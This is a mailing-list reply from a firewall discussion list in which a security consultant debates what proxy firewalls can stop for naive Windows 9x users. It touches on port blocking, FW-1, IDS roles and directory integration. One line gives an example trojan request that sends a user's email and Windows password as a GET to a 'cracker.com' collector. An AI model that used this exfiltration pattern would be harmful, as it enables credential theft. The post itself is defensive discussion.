Bill Royds wrote:
>
> Most users of Win9x are naive about the nature of the Internet and are
> not aware of the risks inherent in various Internet services. They will
> run programs that attempt to download binary data through HTTP, are easily
> persuaded to click on executables in email, etc. A proxy firewall forces
A naive user is an education problem. Could be addressed in some way
using firewalls -deny dangerous services such as 137/138/139 ports at
your router or firewall- but you can't do so much if anyway you allow
ICQ/Napster/iMesh traffic and then your user opens the whole harddisk
to the world.
> connections to be valid for the protocol (but see Marcus Ranum's recent
> rants on firewall-wizards about the real efficacy of proxies). This helps
> prevent trojans from sending raw binary data through port 80 or
> fragmentation attacks through the firewall to the desktop. The logging
Even so, you still can write a trojan sending valid HTTP request as data:
GET http://www.cracker.com/cgi-bin/collector?[EMAIL PROTECTED]+winpass=abc123
or something like...
In the other hand, you have to see what you charge to your firewall
and what you should charge to another device like an IDS. Traditional
firewall definition states things like "Avoid spread of attacks", "limit
network exposure", "enforce usage policy", and so on... but no one
says "it should detect and avoid an attack completely".
> also tends to be a bit more thorough so the full URL of an HTTP request
> is in the logs, one can limit which NNTP groups can be seen, not just
> which server can be used etc.
You can do that with FW-1.
> Since a corporate network may have thousands of machines, each
> belonging to hundreds of possible entities, this helps ensure that the
> rules are applied properly and reduces the risk of machines falling
> through the cracks. It can be done in FW-1 but it takes more than
> skill in playing with the management console to achieve it.
It depends in how you want to manage it... and in depends in other
things too, like your network architecture; not so much (as I see)
in the firewalling technology. But anyway, if you really need
this approach, may be a product like Novell's Border manager wich has
NDS integration may fit your needs. But I think Border manager it's
not the only solution with directories integration. FW-1 has integration
with directories too... :-)
Regards.
--
Martin Humberto Hoz Salvador
Information Security Consultant (ISS ICU, Check Point CCSE)
C I T I
Sendero Sur 285 Col. Contry, Monterrey, Nuevo Leon 64860, MEXICO
Phone: +(52)(8) 357-2267 x139 Fax: +(52)(8) 357-8047
E-mail: [EMAIL PROTECTED] WWW: http://www.citi.com.mx
PGPKey ID: 0x0454E8D9 ICQ Number: 31631540
GIT d- s:(+:+) a-- C+(++++)>$ SILH++++ P++ L+++ E W++ N+ o-- K- w
O M V PS+ PE++ Y+ PGP++ t 5 X+ R tv- b+ DI+ D++ G++ e++ h-- r+ y++
"The software said it requires Windows 95 or *better*, so I installed Linux"
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
